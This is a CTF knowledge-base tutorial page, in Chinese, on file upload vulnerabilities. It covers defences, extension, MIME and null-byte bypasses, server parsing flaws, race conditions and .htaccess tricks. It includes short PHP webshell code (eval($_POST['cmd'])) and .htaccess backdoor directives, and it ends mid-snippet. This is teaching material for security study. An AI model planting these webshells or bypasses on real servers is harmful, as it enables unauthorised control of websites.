<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>文件上传 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/48.59af224e.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>CTF</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/ctf/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/ctf/ctf.html" title="什么是CTF？" class="sidebar-link">什么是CTF？</a></li><li><a href="/knowledge/ctf/xxe.html" title="XXE" class="sidebar-link">XXE</a></li><li><a href="/knowledge/ctf/ssrf-gopher.html" title="ssrf gopher协议" class="sidebar-link">ssrf gopher协议</a></li><li><a href="/knowledge/ctf/exec.html" title="命令执行" class="sidebar-link">命令执行</a></li><li><a href="/knowledge/ctf/PRF.html" title="伪随机数" class="sidebar-link">伪随机数</a></li><li><a href="/knowledge/ctf/php-serialize.html" title="PHP反序列化" class="sidebar-link">PHP反序列化</a></li><li><a href="/knowledge/ctf/uploadfile.html" aria-current="page" title="文件上传" class="active sidebar-link">文件上传</a></li><li><a href="/knowledge/ctf/deserialize-byte-escape.html" title="反序列化字节逃逸" class="sidebar-link">反序列化字节逃逸</a></li><li><a href="/knowledge/ctf/bypass-disable-function.html" title="bypass-disable-function" class="sidebar-link">bypass-disable-function</a></li><li><a href="/knowledge/ctf/JWT.html" title="JWT" class="sidebar-link">JWT</a></li><li><a href="/knowledge/ctf/js-prototype-chain-pollution.html" title="nodejs原型链污染" class="sidebar-link">nodejs原型链污染</a></li><li><a href="/knowledge/ctf/SSTI.html" title="SSTI" class="sidebar-link">SSTI</a></li><li><a href="/knowledge/ctf/CBC.html" title="CBC" class="sidebar-link">CBC</a></li><li><a href="/knowledge/ctf/Hash-Leng-Extension.html" title="哈希长度拓展攻击" class="sidebar-link">哈希长度拓展攻击</a></li><li><a href="/knowledge/ctf/RSA.html" title="RSA" class="sidebar-link">RSA</a></li><li><a href="/knowledge/ctf/Volatility.html" title="Volatility取证分析工具" class="sidebar-link">Volatility取证分析工具</a></li><li><a href="/knowledge/ctf/ret2text.html" title="ret2text" class="sidebar-link">ret2text</a></li><li><a href="/knowledge/ctf/ret2shellcode.html" title="ret2shellcode" class="sidebar-link">ret2shellcode</a></li><li><a href="/knowledge/ctf/ret2syscall.html" title="ret2syscall" class="sidebar-link">ret2syscall</a></li><li><a href="/knowledge/ctf/re2libc.html" title="ret2libc" class="sidebar-link">ret2libc</a></li><li><a href="/knowledge/ctf/ret2csu.html" title="ret2csu" class="sidebar-link">ret2csu</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="文件上传">文件上传 <a href="#文件上传" class="header-anchor">#</a></h1> <h1 id="文件上传漏洞">文件上传漏洞 <a href="#文件上传漏洞" class="header-anchor">#</a></h1> <h2 id="文件上传漏洞原理">文件上传漏洞原理 <a href="#文件上传漏洞原理" class="header-anchor">#</a></h2> <blockquote><p>一些web应用程序中允许上传图片、视频、头像和许多其他类型的文件到服务器中。</p> <p>文件上传漏洞就是利用服务端代码对文件上传路径变量过滤不严格将可执行的文件上传到一个到服务器中 ，再通过URL去访问以执行恶意代码。</p></blockquote> <h2 id="危害">危害 <a href="#危害" class="header-anchor">#</a></h2> <blockquote><p>非法用户可以利用上传的恶意脚本文件控制整个网站，甚至控制服务器。这个恶意的脚本文件，又被称为WebShell，也可以将WebShell脚本称为一种网页后门，WebShell脚本具有非常强大的功能，比如查看服务器目录、服务器中的文件，执行系统命令等。</p></blockquote> <h2 id="防御">防御 <a href="#防御" class="header-anchor">#</a></h2> <blockquote><ul><li>文件扩展名服务端白名单效验</li> <li>文件内容服务端效验</li> <li>上传文件重命名</li> <li>隐藏上传文件路径</li> <li>限制相关目录的执行权限，防范WebShell攻击</li></ul></blockquote> <h2 id="检测与绕过">检测与绕过 <a href="#检测与绕过" class="header-anchor">#</a></h2> <h3 id="无验证">无验证 <a href="#无验证" class="header-anchor">#</a></h3> <p>直接上传一句话木马或者WebShell脚本即可。</p> <h3 id="客户端检测-javascript检测">客户端检测（Javascript检测） <a href="#客户端检测-javascript检测" class="header-anchor">#</a></h3> <p>在网页上写一段Javascript脚本，效验文件上传的后缀名，有白名单形式也有黑名单形式。如果上传文件的后缀不被允许，则会弹窗告知，此时文件上传的数据包并没有发送到服务端，只是在客户端浏览器使用Javascript对数据包进行检测。</p> <p>这时有两种方法可以绕过客户端Javascript的检测：</p> <blockquote><ul><li>使用浏览器插件，删除检测文件后缀的Javascript代码，然后上传文件即可绕过</li> <li>首先把需要上传的文件后缀改成允许上传的文件类型，如jpg、png、gif等，绕过Javascript检测，再抓包，把后缀名改成可执行文件的后缀即可上传成功</li></ul></blockquote> <h3 id="服务端检测-mine类型检测">服务端检测（MINE类型检测） <a href="#服务端检测-mine类型检测" class="header-anchor">#</a></h3> <blockquote><p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p></blockquote> <p>服务器代码判断$_FILES[”file“][&quot;type&quot;]是不是图片格式（<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>），如果不是，则不允许上传该文件。</p> <p>绕过方法：</p> <blockquote><p>抓包后更改Content-Type为允许的类型绕过该代码限制，比如将php文件的<code>Content-Type:application/octet-stream</code>修改为<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>等就可以</p></blockquote> <p>常见MIMETYPE</p> <blockquote><p>audio/mpeg -&gt; .mp3
application/msword -&gt; .doc
application/octet-stream -&gt; .exe
application/pdf -&gt; .pdf
application/x-javascript -&gt; .js
application/x-rar -&gt; .rar
application/zip -&gt; .zip
image/gif -&gt; .gif
image/jpeg -&gt; .jpg / .jpeg
image/png -&gt; .png
text/plain -&gt; .txt
text/html -&gt; .html
video/mp4 -&gt; .mp4</p></blockquote> <h3 id="服务端检测-目录路径检测">服务端检测（目录路径检测） <a href="#服务端检测-目录路径检测" class="header-anchor">#</a></h3> <p>对目录路径的检测不够严谨而导致可以使用%00截断绕过进行攻击。</p> <p>绕过方法:</p> <blockquote><ul><li>例如：/111.php%00.gif/111.gif  -&gt;  /111.php</li></ul></blockquote> <h3 id="服务端检测-文件扩展名检测">服务端检测（文件扩展名检测） <a href="#服务端检测-文件扩展名检测" class="header-anchor">#</a></h3> <p>绕过方法：</p> <blockquote><ul><li>文件名大小写绕过，如：<code>*.pHp</code> <code>*.aSP</code></li> <li>文件名双写绕过，如：<code>*.pphphp</code></li> <li>Unicode： 当目标存在json_decode且检查在json_decode之前,可以将php写为<code>\u0070hp</code></li> <li>名单列表绕过，如：<code>*.asa</code> <code>*.cer</code></li> <li>特殊文件名绕过，比如windows文件名最后不能有.或空格，可设为<code>*.php.</code>或<code>*.php+</code></li> <li>0x00截断绕过，比如：<code>*.php(0x00).jpg</code> 或  <code>*.php%00.jpg</code></li> <li>文件包含漏洞</li> <li>服务器解析漏洞</li> <li>.htaccess文件攻击</li></ul></blockquote> <h3 id="文件截断绕过攻击">文件截断绕过攻击 <a href="#文件截断绕过攻击" class="header-anchor">#</a></h3> <blockquote><p>截断类型：PHP%00截断</p> <p>截断原理：由于00代表结束符，所以会把00后面的所有字符删除</p> <p>截断条件：PHP版本小于5.3.4，PHP的magic_quotes_gpc为OFF状态</p></blockquote> <p>绕过方法：</p> <blockquote><ul><li>例如上传文件shell.php，上传文件路径为/?upload=shell.php</li> <li>绕过：/?upload=shell.php%00.jpg -&gt; /?upload=shell.php</li></ul></blockquote> <h3 id="解析漏洞攻击">解析漏洞攻击 <a href="#解析漏洞攻击" class="header-anchor">#</a></h3> <p>主要有目录解析、文件解析，Apache解析漏洞、Nginx解析漏洞、IIS7.5解析漏洞。</p> <h4 id="目录解析">目录解析 <a href="#目录解析" class="header-anchor">#</a></h4> <blockquote><ul><li>形式：<code>www.xxx.com/xxx.asp/xxx.jpg</code></li> <li>原理：服务器会默认把 <code>.asp</code> 和 <code>.asp</code>目录下的文件都解析成asp文件</li></ul></blockquote> <h4 id="文件解析">文件解析 <a href="#文件解析" class="header-anchor">#</a></h4> <blockquote><ul><li>形式：<code>www.xxx.com/xxx.asp;.jpg</code></li> <li>原理：服务器默认不解析<code>;</code>后面的内容，因此<code>xxx.asp;jpg</code>被解析为<code>xxx.asp</code>文件了</li></ul></blockquote> <h4 id="apache解析漏洞">Apache解析漏洞 <a href="#apache解析漏洞" class="header-anchor">#</a></h4> <p>服务器代码中限制了某些后缀的文件不允许上传，但是有些Apache是允许解析其它后缀的，例如在httpd.conf中如果配置有如下代码，则能够解析php和phtml文件</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>AddType application/x-httpd-php .php .phtml
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>常用后缀：<code>*.php</code> <code>*.php3</code> <code>*.php4</code> <code>*.php5</code> <code>*.phtml</code> <code>*.pht</code></p> <p>在Apache的解析顺序中，是从右到左开始解析文件后缀的，如果最右侧的扩展名不可识别，就继续往左判断，直到遇到可以解析的文件后缀为止。因此，例如上传的文件名为1.php.xxxx，因为后缀xxxx不可解析，所以向左解析后缀php。</p> <blockquote><ul><li>例如：<code>shell.php.qwe.asd</code> -&gt;<code>shell.php</code></li></ul></blockquote> <h4 id="nginx解析漏洞">Nginx解析漏洞 <a href="#nginx解析漏洞" class="header-anchor">#</a></h4> <blockquote><p>Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过 正则匹配设置<strong>SCRIPT_FILENAME</strong>。当访问<code>www.xxx.com/phpinfo.jpg/1.php</code>这个 URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成 SCRIPT_FILENAME传递给PHP CGI。</p> <p>原因是开启了 fix_pathinfo 这个选项，会触发 在PHP中的如下逻辑：
PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会 将phpinfo.jpg作为PHP文件来解析了。</p></blockquote> <p>攻击方式</p> <blockquote><ul><li>形式： <code>www.xxxx.com/UploadFiles/image/1.jpg/1.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg%00.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</code></li> <li>另一种方法：上传一个名字为test.jpg，然后访问<code>test.jpg/.php</code>,在这个目录下就会生成一句话木马shell.php。</li></ul></blockquote> <h4 id="iis7-5解析漏洞">IIS7.5解析漏洞 <a href="#iis7-5解析漏洞" class="header-anchor">#</a></h4> <blockquote><p>IIS7.5的漏洞与nginx的类似，都是由于php配置文件中，开启了 <strong>cgi.fix_pathinfo</strong>，而这并不是nginx或者iis7.5本身的漏洞。</p></blockquote> <h3 id="竞争条件攻击">竞争条件攻击 <a href="#竞争条件攻击" class="header-anchor">#</a></h3> <p>一些网站上传文件的逻辑时先允许上传任意文件，然后检查上传文件的文件是否包含WebShell脚本，如果包含则删除该文件。这里存在的问题是文件上传成功后和删除文件之间存在一个短暂的时间差（因为需要执行检查文件和删除文件的操作），攻击者可以利用这个时间差完成竞争条件的上传漏洞攻击。</p> <p>攻击方法：</p> <blockquote><ul><li>攻击者需要先上传一个WebShell脚本1.php，1.php的内容为生成一个新的WebShell脚本shell.php，1.php写入如下代码</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?php
	fputs(fopen(&quot;../shell.php&quot;, &quot;w&quot;),'&lt;?php @eval($_POST['cmd']); ?&gt;');
?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><ul><li>当1.php上传完成后，客户端立即访问1.php，则会在服务端当前目录下自动生成shell.php，这时攻击者就利用了时间差完成了WebShell的上传</li></ul></blockquote> <h3 id="双文件上传">双文件上传 <a href="#双文件上传" class="header-anchor">#</a></h3> <p>本意为上传两个或多个文件去突破。上传点支持多文件上传，但是却只对第一个文件做了过滤。</p> <p>利用方式：</p> <blockquote><ul><li>在存在双文件上传漏洞的页面中，查看上传的页面。F12找到上传的post表单，action属性是指定上传检测页面，一般是写的绝对路径，比如：<code>xxx.asp/xxx.php</code></li> <li>补全url：<code>https://www.xxx.com/xxx.php(asp)</code></li> <li>构造本地post提交表单</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;form action=&quot;https://www.xxx.com/xxx.asp(php)&quot; method=&quot;post&quot;
name=&quot;form1&quot; enctype=&quot;multipart/form‐data&quot;&gt;
&lt;input name=&quot;FileName1&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;
&lt;input name=&quot;FileName2&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;
&lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;上传&quot;&gt;
&lt;/form&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>利用时只需要修改action的值为指定上传页面即可</p> <ul><li>第一个文件上传允许的文件类型（<code>.jpg</code> <code>.png</code> <code>.gif</code> 等），第二个上传文件是一句话木马或者WebShell脚本。这样就可以突破上传限制，成功上传木马到服务器。</li></ul></blockquote> <h3 id="php3457">php3457 <a href="#php3457" class="header-anchor">#</a></h3> <blockquote><p>该项为apache专属。关键点在<code>/etc/apache2/mods-available/php5.6.conf</code>这个文件，满足<code>.+\.ph(p[3457]?|t|tml)$</code>，都会被当作php文件解析。</p> <p>在apache2目录下<code>grep -r x-httpd-php /etc/apache2</code>找到对应文件就能知道解析哪些后缀。</p></blockquote> <h3 id="htaccess文件攻击">.htaccess文件攻击 <a href="#htaccess文件攻击" class="header-anchor">#</a></h3> <blockquote><p>.htaccess文件(或者&quot;分布式配置文件&quot;）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。</p> <p>概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p> <p>启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。</p> <p>笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。</p></blockquote> <p>一般<code>.htaccess</code>可以用来留后门和针对黑名单绕过。在上传网站的根目录下，上传一个<code>.htaccess</code>文件即可。</p> <p>绕过方法：</p> <blockquote><ul><li>针对黑名单绕过</li></ul> <p>创建一个txt文件，写入</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>AddType  application/x-httpd-php    .png
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>另存为 <code>.htaccess</code> 名称，保存类型为所有文件，即可将<code>png</code>文件解析为<code>php</code>文件。</p> <ul><li>留后门</li></ul> <p>在<code>.htaccess</code> 内写入<code>php</code>解析规则，类似于把文件名包含<code>s</code>的解析成<code>php</code>文件</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;FilesMatch &quot;s&quot;&gt;
SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><code>shell.png</code> 就会以<code>php</code>文件执行</p> <ul><li>利用.htaccess进行文件包含</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>php_value auto_prepend_file &quot;.htaccess&quot;
#&lt;?php eval($_POST[cmd]);?&gt;
